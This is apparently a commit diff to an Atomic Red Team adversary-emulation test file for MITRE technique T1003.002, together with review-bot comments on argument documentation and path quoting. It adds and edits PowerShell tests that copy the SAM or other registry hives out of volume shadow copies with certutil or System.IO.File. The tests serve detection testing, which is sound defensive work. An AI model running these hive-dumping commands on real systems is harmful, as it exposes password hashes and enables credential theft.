Update T1003.002.yaml (#1595)
Added test 6 to dump hives with System.IO.File. Also tweaked test 5 so that the hive could be selected by the user, same as in test 6
@@ -99,19 +99,23 @@ atomic_tests:
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
|
||||
- name: dump volume shadow copy hive with certutil
|
||||
- name: dump volume shadow copy hives with certutil
|
||||
auto_generated_guid: eeb9751a-d598-42d3-b11c-c122d9c3f6c7
|
||||
description: |
|
||||
Dump the SAM hive from volume shadow copies with the certutil utility
|
||||
Dump hives from volume shadow copies with the certutil utility
|
||||
This can be done with a non-admin user account
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
file_path:
|
||||
dump_path:
|
||||
description: Path where the hive will be dumped
|
||||
type: Path
|
||||
default: $ENV:temp
|
||||
file_name:
|
||||
target_hive:
|
||||
description: Hive you wish to dump
|
||||
type: String
|
||||
default: SAM
|
||||
dumped_hive:
|
||||
description: Name of the dumped hive
|
||||
type: String
|
||||
default: myhive
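Review bot: The `dump_path` argument is declared `type: Path`, yet its default `$ENV:temp` is a PowerShell expression and the description does not tell a user in what form a literal directory has to be supplied; since the value appears to be substituted into the PowerShell command text unquoted, the `dump_path:` entry should say so, e.g. `description: Path where the hive will be dumped (substituted into the PowerShell command as-is, so use a PowerShell expression such as $ENV:temp or a quoted literal path)`. Likewise `target_hive` is described only as "Hive you wish to dump"; stating that it is the hive file name under the Windows config directory, as the default `SAM` implies, would make the accepted values clear. The test block this hunk edits begins before the hunk, and the command lines that consume these arguments are in the following hunk.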
|
||||
@@ -121,11 +125,45 @@ atomic_tests:
|
||||
$shadowlist = get-wmiobject win32_shadowcopy
|
||||
$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
|
||||
$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
|
||||
$shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\SYSTEM"
|
||||
certutil -f -v -encodehex $shadowpath #{file_path}\#{file_name} 2
|
||||
$shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
|
||||
certutil -f -v -encodehex $shadowpath #{dump_path}\#{dumped_hive} 2
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
cleanup_command: |
|
||||
write-host ""
|
||||
$toremove = #{file_path} + "\" + '#{file_name}'
|
||||
$toremove = #{dump_path} + "\" + '#{dumped_hive}'
|
||||
rm $toremove
|
||||
|
||||
- name: dump volume shadow copy hives with System.IO.File
|
||||
description: |
|
||||
Dump hives from volume shadow copies with System.IO.File
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
dump_path:
|
||||
description: Path where the hive will be dumped
|
||||
type: Path
|
||||
default: $ENV:temp
|
||||
target_hive:
|
||||
description: Hive you wish to dump
|
||||
type: String
|
||||
default: SAM
|
||||
dumped_hive:
|
||||
description: Name of the dumped hive
|
||||
type: String
|
||||
default: myhive
|
||||
executor:
|
||||
command: |
|
||||
write-host ""
|
||||
$shadowlist = get-wmiobject win32_shadowcopy
|
||||
$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
|
||||
$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
|
||||
$shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
|
||||
$mydump = #{dump_path} + '\' + '#{dumped_hive}'
|
||||
[System.IO.File]::Copy($shadowpath , $mydump)
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
cleanup_command: |
|
||||
write-host ""
|
||||
$toremove = #{dump_path} + "\" + '#{dumped_hive}'
|
||||
rm $toremove
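Review bot: The new test added at `- name: dump volume shadow copy hives with System.IO.File` has no `auto_generated_guid`, while the neighbouring test carries one and that field appears to be how tests in this file are identified; a value should be generated with the repository's tooling and added directly under the name line, e.g. `auto_generated_guid: <GENERATED-GUID-PLACEHOLDER>`. Separately, the path assembly in the new command and in both cleanup commands (`$mydump = #{dump_path} + '\' + '#{dumped_hive}'` and `$toremove = #{dump_path} + "\" + '#{dumped_hive}'`) inserts `dump_path` unquoted, so it only works when the argument is a PowerShell expression like the default `$ENV:temp`; an unquoted literal directory at the start of the right-hand side would be parsed as a command name. `$mydump = Join-Path "#{dump_path}" "#{dumped_hive}"` (and the same form for `$toremove`) accepts both a literal path and an expression. The `certutil` line earlier in this hunk relies on the same expansion, and the argument definitions that should document this are in the previous hunk.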
|
||||